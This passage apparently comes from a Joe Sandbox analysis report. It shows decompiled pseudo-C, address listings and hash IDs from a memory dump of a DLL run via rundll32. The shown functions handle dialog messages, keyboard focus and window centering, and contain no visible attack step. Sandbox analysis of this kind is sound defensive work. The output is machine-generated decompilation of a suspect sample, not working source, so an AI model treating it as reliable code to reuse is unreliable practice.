                                                                                                                    														if(_t232 == 3) {
                                                                                                                    															goto L103;
                                                                                                                    														} else {
                                                                                                                    															__eflags = _t232 - 9;
                                                                                                                    															if(_t232 == 9) {
                                                                                                                    																__eflags = _t153 & 0x00000002;
                                                                                                                    																if((_t153 & 0x00000002) != 0) {
                                                                                                                    																	goto L75;
                                                                                                                    																} else {
                                                                                                                    																	_t188 = GetKeyState(0x10);
                                                                                                                    																	_t255 = _a4;
                                                                                                                    																	__eflags = _t188;
                                                                                                                    																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                    																	_t232 = _t255;
                                                                                                                    																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
                                                                                                                    																	__eflags = _t189;
                                                                                                                    																	if(_t189 == 0) {
                                                                                                                    																		goto L75;
                                                                                                                    																	} else {
                                                                                                                    																		__eflags =  *(_t189 + 4);
                                                                                                                    																		if( *(_t189 + 4) == 0) {
                                                                                                                    																			_t190 =  *_t189;
                                                                                                                    																			__eflags = _t190;
                                                                                                                    																			if(_t190 == 0) {
                                                                                                                    																				_t232 = _t255;
                                                                                                                    																				_t191 = E10016D48(_t255, _v36, _t229);
                                                                                                                    																			} else {
                                                                                                                    																				_t191 = E1001B042(_t229, _t260, _t190);
                                                                                                                    																			}
                                                                                                                    																			_t244 = _t191;
                                                                                                                    																			__eflags = _t244;
                                                                                                                    																			if(_t244 != 0) {
                                                                                                                    																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                    																				E1002A17D(_t244);
                                                                                                                    																				E1002A347(_t229, _t232, _t260, _v24, _t244);
                                                                                                                    																				_pop(_t232);
                                                                                                                    																			}
                                                                                                                    																		} else {
                                                                                                                    																			_t195 =  *(_t189 + 4);
                                                                                                                    																			_t232 = _t195;
                                                                                                                    																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                    																		}
                                                                                                                    																		goto L125;
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    																goto L126;
                                                                                                                    															} else {
                                                                                                                    																__eflags = _t232 - 0xd;
                                                                                                                    																if(_t232 == 0xd) {
                                                                                                                    																	L97:
                                                                                                                    																	__eflags = _t153 & 0x00000004;
                                                                                                                    																	if((_t153 & 0x00000004) != 0) {
                                                                                                                    																		goto L75;
                                                                                                                    																	} else {
                                                                                                                    																		_t182 = E1002A122(_v24);
                                                                                                                    																		__eflags = _t182 & 0x00000010;
                                                                                                                    																		_pop(_t232);
                                                                                                                    																		if((_t182 & 0x00000010) == 0) {
                                                                                                                    																			_t183 = E1002A4C8(_a4);
                                                                                                                    																		} else {
                                                                                                                    																			_t251 = _v24;
                                                                                                                    																			_t232 = _t251;
                                                                                                                    																			_t183 = E1001DE35(_t251);
                                                                                                                    																		}
                                                                                                                    																		_t243 = 0;
                                                                                                                    																		__eflags = _t251;
                                                                                                                    																		_v40 = _t183;
                                                                                                                    																		if(_t251 != 0) {
                                                                                                                    																			L105:
                                                                                                                    																			_t232 = _t251;
                                                                                                                    																			_t184 = E1001DEAF(_t251);
                                                                                                                    																			__eflags = _t184;
                                                                                                                    																			if(_t184 != 0) {
                                                                                                                    																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                    																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                    																					goto L75;
                                                                                                                    																				} else {
                                                                                                                    																					_push(_t243);
                                                                                                                    																					_push(_t243);
                                                                                                                    																					_push(_t243);
                                                                                                                    																					_push(1);
                                                                                                                    																					_push(0xfffffdd9);
                                                                                                                    																					_push(_t251);
                                                                                                                    																					_v8 = _t243;
                                                                                                                    																					E1001DF0C();
                                                                                                                    																					_v8 = _v8 | 0xffffffff;
                                                                                                                    																					goto L125;
                                                                                                                    																				}
                                                                                                                    																			} else {
                                                                                                                    																				MessageBeep(_t243);
                                                                                                                    																				goto L75;
                                                                                                                    																			}
                                                                                                                    																		} else {
                                                                                                                    																			L104:
                                                                                                                    																			_t251 = E1002A3C2(_a4, _v40);
                                                                                                                    																			__eflags = _t251 - _t243;
                                                                                                                    																			if(_t251 == _t243) {
                                                                                                                    																				goto L75;
                                                                                                                    																			} else {
                                                                                                                    																				goto L105;
                                                                                                                    																			}
                                                                                                                    																		}
                                                                                                                    																	}
                                                                                                                    																	goto L126;
                                                                                                                    																} else {
                                                                                                                    																	goto L75;
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    												goto L79;
                                                                                                                    											} else {
                                                                                                                    												_t198 = _t152;
                                                                                                                    												__eflags = _t198;
                                                                                                                    												if(_t198 == 0) {
                                                                                                                    													L62:
                                                                                                                    													_t199 = E1002A085(_v36, _t240);
                                                                                                                    													__eflags = _v32 - 0x102;
                                                                                                                    													if(_v32 != 0x102) {
                                                                                                                    														L64:
                                                                                                                    														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                    														__eflags = _t232 - 9;
                                                                                                                    														if(_t232 != 9) {
                                                                                                                    															L66:
                                                                                                                    															__eflags = _t232 - 0x20;
                                                                                                                    															if(__eflags == 0) {
                                                                                                                    																goto L54;
                                                                                                                    															} else {
                                                                                                                    																_push(_t240);
                                                                                                                    																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                    																__eflags = _t200;
                                                                                                                    																if(_t200 == 0) {
                                                                                                                    																	goto L75;
                                                                                                                    																} else {
                                                                                                                    																	_t201 =  *(_t200 + 4);
                                                                                                                    																	__eflags = _t201;
                                                                                                                    																	if(_t201 == 0) {
                                                                                                                    																		goto L75;
                                                                                                                    																	} else {
                                                                                                                    																		_t232 = _t201;
                                                                                                                    																		E100246E1(_t201, _t240);
                                                                                                                    																		L125:
                                                                                                                    																		_v28 = 1;
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    																goto L79;
                                                                                                                    															}
                                                                                                                    														} else {
                                                                                                                    															__eflags = _t199 & 0x00000002;
                                                                                                                    															if((_t199 & 0x00000002) != 0) {
                                                                                                                    																goto L75;
                                                                                                                    															} else {
                                                                                                                    																goto L66;
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													} else {
                                                                                                                    														__eflags = _t199 & 0x00000084;
                                                                                                                    														if((_t199 & 0x00000084) != 0) {
                                                                                                                    															goto L75;
                                                                                                                    														} else {
                                                                                                                    															goto L64;
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												} else {
                                                                                                                    													__eflags = _t198 != 4;
                                                                                                                    													if(_t198 != 4) {
                                                                                                                    														L75:
                                                                                                                    														_t154 = _a4;
                                                                                                                    														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                    														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                    															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                    															__eflags = _t165;
                                                                                                                    															_v28 = _t165;
                                                                                                                    															if(_t165 != 0) {
                                                                                                                    																_t167 = E1001B042(_t229, _t260, GetFocus());
                                                                                                                    																__eflags = _t167 - _v24;
                                                                                                                    																if(_t167 != _v24) {
                                                                                                                    																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                    																	_pop(_t232);
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    														L79:
                                                                                                                    														_t155 = IsWindow(_v52);
                                                                                                                    														__eflags = _t155;
                                                                                                                    														if(_t155 != 0) {
                                                                                                                    															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                    															_t161 = IsWindow(_v48);
                                                                                                                    															__eflags = _t161;
                                                                                                                    															if(_t161 != 0) {
                                                                                                                    																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    														_t156 = _v28;
                                                                                                                    													} else {
                                                                                                                    														__eflags = _v24;
                                                                                                                    														if(_v24 != 0) {
                                                                                                                    															L61:
                                                                                                                    															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                    															if( *(_t240 + 8) == 0x20) {
                                                                                                                    																goto L75;
                                                                                                                    															} else {
                                                                                                                    																goto L62;
                                                                                                                    															}
                                                                                                                    														} else {
                                                                                                                    															_t204 = GetKeyState(0x12);
                                                                                                                    															__eflags = _t204;
                                                                                                                    															if(_t204 >= 0) {
                                                                                                                    																goto L75;
                                                                                                                    															} else {
                                                                                                                    																goto L61;
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										} else {
                                                                                                                    											_t256 = _t149;
                                                                                                                    											while(1) {
                                                                                                                    												__eflags =  *(_t256 + 0x50);
                                                                                                                    												if( *(_t256 + 0x50) != 0) {
                                                                                                                    													break;
                                                                                                                    												}
                                                                                                                    												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                    												__eflags = _t211 - _a4;
                                                                                                                    												if(_t211 != _a4) {
                                                                                                                    													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                    													__eflags = _t256;
                                                                                                                    													if(_t256 != 0) {
                                                                                                                    														continue;
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    												break;
                                                                                                                    											}
                                                                                                                    											__eflags = _t256;
                                                                                                                    											if(_t256 == 0) {
                                                                                                                    												L45:
                                                                                                                    												__eflags = _v32 - 0x101;
                                                                                                                    												if(_v32 == 0x101) {
                                                                                                                    													L48:
                                                                                                                    													__eflags = _t256;
                                                                                                                    													if(_t256 == 0) {
                                                                                                                    														goto L55;
                                                                                                                    													} else {
                                                                                                                    														_t257 =  *(_t256 + 0x50);
                                                                                                                    														__eflags = _t257;
                                                                                                                    														if(_t257 == 0) {
                                                                                                                    															goto L55;
                                                                                                                    														} else {
                                                                                                                    															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                    															__eflags = _t206 - 0xd;
                                                                                                                    															if(_t206 != 0xd) {
                                                                                                                    																L52:
                                                                                                                    																__eflags = _t206 - 0x1b;
                                                                                                                    																if(_t206 != 0x1b) {
                                                                                                                    																	goto L55;
                                                                                                                    																} else {
                                                                                                                    																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                    																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                    																		goto L55;
                                                                                                                    																	} else {
                                                                                                                    																		goto L54;
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    															} else {
                                                                                                                    																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                    																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                    																	L54:
                                                                                                                    																	_t156 = 0;
                                                                                                                    																} else {
                                                                                                                    																	goto L52;
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												} else {
                                                                                                                    													__eflags = _v32 - _t229;
                                                                                                                    													if(_v32 == _t229) {
                                                                                                                    														goto L48;
                                                                                                                    													} else {
                                                                                                                    														__eflags = _v32 - 0x102;
                                                                                                                    														if(_v32 != 0x102) {
                                                                                                                    															L55:
                                                                                                                    															_t240 = _a8;
                                                                                                                    															goto L56;
                                                                                                                    														} else {
                                                                                                                    															goto L48;
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												_t207 =  *(_t256 + 0x50);
                                                                                                                    												__eflags = _t207;
                                                                                                                    												if(_t207 == 0) {
                                                                                                                    													goto L45;
                                                                                                                    												} else {
                                                                                                                    													__eflags =  *(_t207 + 0x58);
                                                                                                                    													if( *(_t207 + 0x58) == 0) {
                                                                                                                    														goto L45;
                                                                                                                    													} else {
                                                                                                                    														_t208 =  *(_t207 + 0x58);
                                                                                                                    														_t232 =  *_t208;
                                                                                                                    														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                    														__eflags = _t209;
                                                                                                                    														if(_t209 != 0) {
                                                                                                                    															goto L45;
                                                                                                                    														} else {
                                                                                                                    															_t156 = _t209 + 1;
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										goto L34;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								return E10030DFF(_t156);
                                                                                                                    							} else {
                                                                                                                    								_t232 =  *(_t238 + 4);
                                                                                                                    								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                    								__eflags = _t215 & 0x08000000;
                                                                                                                    								if((_t215 & 0x08000000) == 0) {
                                                                                                                    									goto L20;
                                                                                                                    								} else {
                                                                                                                    									goto L23;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							_t216 =  *(_t238 + 4);
                                                                                                                    							if(_t216 == 0) {
                                                                                                                    								_t217 =  *_t238;
                                                                                                                    							} else {
                                                                                                                    								_t217 =  *(_t216 + 0x24);
                                                                                                                    							}
                                                                                                                    							if(_t217 == 0) {
                                                                                                                    								goto L21;
                                                                                                                    							} else {
                                                                                                                    								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                    									L23:
                                                                                                                    									__eflags = _t238 - _v8;
                                                                                                                    									if(_t238 == _v8) {
                                                                                                                    										break;
                                                                                                                    									} else {
                                                                                                                    										__eflags = _v8;
                                                                                                                    										if(_v8 == 0) {
                                                                                                                    											_v8 = _t238;
                                                                                                                    										}
                                                                                                                    										_t247 = _t247 + 1;
                                                                                                                    										__eflags = _t247 - 0x200;
                                                                                                                    										if(_t247 < 0x200) {
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											break;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									L20:
                                                                                                                    									_t141 = _t238;
                                                                                                                    									L28:
                                                                                                                    									return _t141;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						_t232 = _a4;
                                                                                                                    						_t238 = E1001E11F(_a4, _t238, 0);
                                                                                                                    						if(_t238 == 0) {
                                                                                                                    							break;
                                                                                                                    						} else {
                                                                                                                    							goto L14;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					L126:
                                                                                                                    				}
                                                                                                                    				_t141 = 0;
                                                                                                                    				__eflags = 0;
                                                                                                                    				goto L28;
                                                                                                                    			}

                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a7db
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a7c9
                                                                                                                    0x1002a7dd
                                                                                                                    0x1002a7dd
                                                                                                                    0x1002a7aa
                                                                                                                    0x1002a7a0
                                                                                                                    0x1002a7df
                                                                                                                    0x1002a7df
                                                                                                                    0x1002a7e1
                                                                                                                    0x1002a7ed
                                                                                                                    0x1002a7f3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a7f6
                                                                                                                    0x1002a7fd
                                                                                                                    0x1002a7fe
                                                                                                                    0x1002a810
                                                                                                                    0x1002a812
                                                                                                                    0x1002a835
                                                                                                                    0x1002a835
                                                                                                                    0x1002a838
                                                                                                                    0x1002a868
                                                                                                                    0x1002a86d
                                                                                                                    0x1002a86e
                                                                                                                    0x1002a875
                                                                                                                    0x1002a87a
                                                                                                                    0x1002a87d
                                                                                                                    0x1002a87f
                                                                                                                    0x1002a889
                                                                                                                    0x1002a881
                                                                                                                    0x1002a881
                                                                                                                    0x1002a881
                                                                                                                    0x1002a88c
                                                                                                                    0x1002a88f
                                                                                                                    0x1002a892
                                                                                                                    0x1002a89c
                                                                                                                    0x1002a89f
                                                                                                                    0x1002a8a4
                                                                                                                    0x1002a8a9
                                                                                                                    0x1002a8ab
                                                                                                                    0x1002a8ae
                                                                                                                    0x1002a8b8
                                                                                                                    0x1002a8be
                                                                                                                    0x1002a8c1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a8b0
                                                                                                                    0x1002a8b0
                                                                                                                    0x1002a8b6
                                                                                                                    0x1002a8c7
                                                                                                                    0x1002a8c7
                                                                                                                    0x1002a8c9
                                                                                                                    0x1002a976
                                                                                                                    0x1002a978
                                                                                                                    0x1002a97a
                                                                                                                    0x1002a97d
                                                                                                                    0x1002a982
                                                                                                                    0x1002a985
                                                                                                                    0x1002a98b
                                                                                                                    0x1002a98b
                                                                                                                    0x1002a98d
                                                                                                                    0x1002a994
                                                                                                                    0x1002aa1e
                                                                                                                    0x1002aa23
                                                                                                                    0x1002aa27
                                                                                                                    0x1002aa2a
                                                                                                                    0x1002ab67
                                                                                                                    0x1002ab6a
                                                                                                                    0x00000000
                                                                                                                    0x1002ab70
                                                                                                                    0x1002ab70
                                                                                                                    0x1002ab73
                                                                                                                    0x1002ac23
                                                                                                                    0x00000000
                                                                                                                    0x1002ab79
                                                                                                                    0x1002ab79
                                                                                                                    0x1002ab7c
                                                                                                                    0x1002ac2a
                                                                                                                    0x1002ac2e
                                                                                                                    0x1002ac33
                                                                                                                    0x1002ac35
                                                                                                                    0x00000000
                                                                                                                    0x1002ac3b
                                                                                                                    0x1002ac3b
                                                                                                                    0x1002ac3f
                                                                                                                    0x1002ac42
                                                                                                                    0x1002ac44
                                                                                                                    0x1002ac4d
                                                                                                                    0x1002ac46
                                                                                                                    0x1002ac46
                                                                                                                    0x1002ac46
                                                                                                                    0x1002ac52
                                                                                                                    0x1002ac54
                                                                                                                    0x1002ac56
                                                                                                                    0x00000000
                                                                                                                    0x1002ac5c
                                                                                                                    0x1002ac5c
                                                                                                                    0x1002ac60
                                                                                                                    0x1002ac62
                                                                                                                    0x1002ac66
                                                                                                                    0x1002ac66
                                                                                                                    0x1002ac6b
                                                                                                                    0x1002ac6f
                                                                                                                    0x1002ac7f
                                                                                                                    0x1002ac81
                                                                                                                    0x1002ac83
                                                                                                                    0x1002ac90
                                                                                                                    0x1002ac96
                                                                                                                    0x1002ac85
                                                                                                                    0x1002ac86
                                                                                                                    0x1002ac86
                                                                                                                    0x1002ac9b
                                                                                                                    0x1002ac9d
                                                                                                                    0x1002ac9f
                                                                                                                    0x00000000
                                                                                                                    0x1002aca5
                                                                                                                    0x1002acab
                                                                                                                    0x1002acae
                                                                                                                    0x1002acb1
                                                                                                                    0x1002acb6
                                                                                                                    0x1002acb9
                                                                                                                    0x1002acc6
                                                                                                                    0x1002acc6
                                                                                                                    0x00000000
                                                                                                                    0x1002acb9
                                                                                                                    0x1002ac71
                                                                                                                    0x1002ac71
                                                                                                                    0x1002ac77
                                                                                                                    0x00000000
                                                                                                                    0x1002ac77
                                                                                                                    0x1002ac6f
                                                                                                                    0x1002ac56
                                                                                                                    0x1002ab82
                                                                                                                    0x1002ab82
                                                                                                                    0x1002ab85
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002ab85
                                                                                                                    0x1002ab7c
                                                                                                                    0x1002ab73
                                                                                                                    0x00000000
                                                                                                                    0x1002aa30
                                                                                                                    0x1002aa30
                                                                                                                    0x1002abbf
                                                                                                                    0x1002abbf
                                                                                                                    0x1002abbf
                                                                                                                    0x00000000
                                                                                                                    0x1002aa36
                                                                                                                    0x1002aa36
                                                                                                                    0x1002aa39
                                                                                                                    0x00000000
                                                                                                                    0x1002aa3f
                                                                                                                    0x1002aa3f
                                                                                                                    0x1002aa42
                                                                                                                    0x1002aae1
                                                                                                                    0x1002aae3
                                                                                                                    0x00000000
                                                                                                                    0x1002aae9
                                                                                                                    0x1002aaeb
                                                                                                                    0x1002aaf1
                                                                                                                    0x1002aaf6
                                                                                                                    0x1002aaf9
                                                                                                                    0x1002aafc
                                                                                                                    0x1002ab01
                                                                                                                    0x1002ab06
                                                                                                                    0x1002ab08
                                                                                                                    0x00000000
                                                                                                                    0x1002ab0e
                                                                                                                    0x1002ab0e
                                                                                                                    0x1002ab12
                                                                                                                    0x1002ab27
                                                                                                                    0x1002ab29
                                                                                                                    0x1002ab2b
                                                                                                                    0x1002ab39
                                                                                                                    0x1002ab3b
                                                                                                                    0x1002ab2d
                                                                                                                    0x1002ab2e
                                                                                                                    0x1002ab2e
                                                                                                                    0x1002ab40
                                                                                                                    0x1002ab42
                                                                                                                    0x1002ab44
                                                                                                                    0x1002ab4d
                                                                                                                    0x1002ab52
                                                                                                                    0x1002ab5b
                                                                                                                    0x1002ab61
                                                                                                                    0x1002ab61
                                                                                                                    0x1002ab14
                                                                                                                    0x1002ab14
                                                                                                                    0x1002ab1a
                                                                                                                    0x1002ab1c
                                                                                                                    0x1002ab1c
                                                                                                                    0x00000000
                                                                                                                    0x1002ab12
                                                                                                                    0x1002ab08
                                                                                                                    0x00000000
                                                                                                                    0x1002aa48
                                                                                                                    0x1002aa48
                                                                                                                    0x1002aa4b
                                                                                                                    0x1002ab8b
                                                                                                                    0x1002ab8b
                                                                                                                    0x1002ab8d
                                                                                                                    0x00000000
                                                                                                                    0x1002ab93
                                                                                                                    0x1002ab96
                                                                                                                    0x1002ab9b
                                                                                                                    0x1002ab9d
                                                                                                                    0x1002ab9e
                                                                                                                    0x1002abaf
                                                                                                                    0x1002aba0
                                                                                                                    0x1002aba0
                                                                                                                    0x1002a84e
                                                                                                                    0x1002a851
                                                                                                                    0x1002a853
                                                                                                                    0x1002a853
                                                                                                                    0x1002a856
                                                                                                                    0x1002a857
                                                                                                                    0x1002a85d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a85d
                                                                                                                    0x1002a831
                                                                                                                    0x1002a831
                                                                                                                    0x1002a831
                                                                                                                    0x1002a861
                                                                                                                    0x1002a865
                                                                                                                    0x1002a865
                                                                                                                    0x1002a82f
                                                                                                                    0x1002a824
                                                                                                                    0x1002a800
                                                                                                                    0x1002a800
                                                                                                                    0x1002a80a
                                                                                                                    0x1002a80e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a80e
                                                                                                                    0x00000000
                                                                                                                    0x1002a7fe
                                                                                                                    0x1002a85f
                                                                                                                    0x1002a85f
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 656273425-0
                                                                                                                    • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                    • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                    • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                    • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				struct tagRECT _v28;
                                                                                                                    				struct tagRECT _v44;
                                                                                                                    				struct tagRECT _v60;
                                                                                                                    				struct tagRECT _v80;
                                                                                                                    				char _v100;
                                                                                                                    				void* __edi;
                                                                                                                    				intOrPtr _t58;
                                                                                                                    				struct HWND__* _t59;
                                                                                                                    				intOrPtr _t94;
                                                                                                                    				signed int _t103;
                                                                                                                    				struct HWND__* _t104;
                                                                                                                    				void* _t105;
                                                                                                                    				struct HWND__* _t107;
                                                                                                                    				long _t108;
                                                                                                                    				long _t116;
                                                                                                                    				void* _t119;
                                                                                                                    				struct HWND__* _t121;
                                                                                                                    				void* _t123;
                                                                                                                    				intOrPtr _t125;
                                                                                                                    				intOrPtr _t129;
                                                                                                                    
                                                                                                                    				_t119 = __edx;
                                                                                                                    				_t105 = __ebx;
                                                                                                                    				_t125 = __ecx;
                                                                                                                    				_v12 = __ecx;
                                                                                                                    				_v8 = E1001DDC0(__ecx);
                                                                                                                    				_t58 = _a4;
                                                                                                                    				if(_t58 == 0) {
                                                                                                                    					if((_v8 & 0x40000000) == 0) {
                                                                                                                    						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                    					} else {
                                                                                                                    						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                    					}
                                                                                                                    					_t121 = _t59;
                                                                                                                    					if(_t121 != 0) {
                                                                                                                    						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                    						if(_t104 != 0) {
                                                                                                                    							_t121 = _t104;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                    					_t121 =  *_t4;
                                                                                                                    				}
                                                                                                                    				_push(_t105);
                                                                                                                    				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                    				if((_v8 & 0x40000000) != 0) {
                                                                                                                    					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                    					GetClientRect(_t107,  &_v28);
                                                                                                                    					GetClientRect(_t121,  &_v44);
                                                                                                                    					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                    				} else {
                                                                                                                    					if(_t121 != 0) {
                                                                                                                    						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                    						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                    							_t121 = 0;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_v100 = 0x28;
                                                                                                                    					if(_t121 != 0) {
                                                                                                                    						GetWindowRect(_t121,  &_v44);
                                                                                                                    						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
                                                                                                                    						CopyRect( &_v28,  &_v80);
                                                                                                                    					} else {
                                                                                                                    						_t94 = E10014B42();
                                                                                                                    						if(_t94 != 0) {
                                                                                                                    							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                    						}
                                                                                                                    						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
                                                                                                                    						CopyRect( &_v44,  &_v80);
                                                                                                                    						CopyRect( &_v28,  &_v80);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				_t108 = _v60.left;
                                                                                                                    				asm("cdq");
                                                                                                                    				_t123 = _v60.right - _t108;
                                                                                                                    				asm("cdq");
                                                                                                                    				_t120 = _v44.bottom;
                                                                                                                    				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                    				_a4 = _v60.bottom - _v60.top;
                                                                                                                    				asm("cdq");
                                                                                                                    				asm("cdq");
                                                                                                                    				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                    				if(_t116 >= _v28.left) {
                                                                                                                    					if(_t123 + _t116 > _v28.right) {
                                                                                                                    						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t116 = _v28.left;
                                                                                                                    				}
                                                                                                                    				if(_t129 >= _v28.top) {
                                                                                                                    					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                    						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t129 = _v28.top;
                                                                                                                    				}
                                                                                                                    				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                    			}

























                                                                                                                    0x1001abda
                                                                                                                    0x1001abda
                                                                                                                    0x1001ac07

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    • GetParent.USER32(?), ref: 1001AA75
                                                                                                                    • SendMessageA.USER32 ref: 1001AA98
                                                                                                                    • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                    • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
